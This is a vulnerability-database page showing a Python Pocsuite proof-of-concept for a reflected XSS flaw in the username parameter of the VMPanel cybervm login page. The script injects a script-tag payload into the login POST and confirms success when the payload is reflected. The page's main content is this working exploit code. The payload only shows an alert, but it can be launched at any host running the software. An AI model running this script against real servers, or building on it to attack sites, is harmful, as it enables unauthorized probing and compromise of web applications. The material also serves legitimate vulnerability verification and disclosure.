Vulners
Lucene search
VMPanel cybervm log on at the parameters the username reflected XSS vulnerability
#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import random
import string
class TestPOC(POCBase):
vulID = '1' # ssvid
version = '1.0'
author = ['kikay']
vulDate = '2016-12-10'
createDate = '2016-12-10'
updateDate = '2016-12-10'
references = ['http://www.seebug.org/vuldb/ssvid-']
name = 'VMPanel cybervm 登录处 参数username 反射型XSS漏洞'
appPowerLink = 'http://cybervm.com'
appName = 'VMPanel'
appVersion = 'N/A'
vulType = 'XSS漏洞'
desc = '''
VMPanel在登录页面的用户名输入框由于过滤不严,导致出现XSS漏洞。
'''
samples = ['http://cybervm.com:2023']
def _attack(self):
#验证XSS漏洞
result = {}
#构造随机字符串
Rand_str = random.sample("123478acioepLFTQVBUSEusb90",7)
#筛选特征字符串
keyword=''.join(Rand_str)
js='<script>alert(/{str}/)</script>'.format(str=keyword)
payload='test">{js}<a id="'.format(js=js)
#漏洞连接
vulurl=("{url}/index.php?act=login").format(url=self.url)
#构造POST参数
post_data={
'username':payload,
'password':'test',
'login':'Login'
}
#自定义的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
response=req.post(url=vulurl,data=post_data,headers=httphead,timeout=50)
#查找特征字符串
if response.status_code==200 and js in response.content:
result['VerifyInfo']={}
result['VerifyInfo']['URL']=vulurl
result['VerifyInfo']['Payload']=payload
return self.parse_output(result)
def _verify(self):
return self._attack()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Mar 2017 00:00Current
6.4Medium risk
Vulners AI Score6.4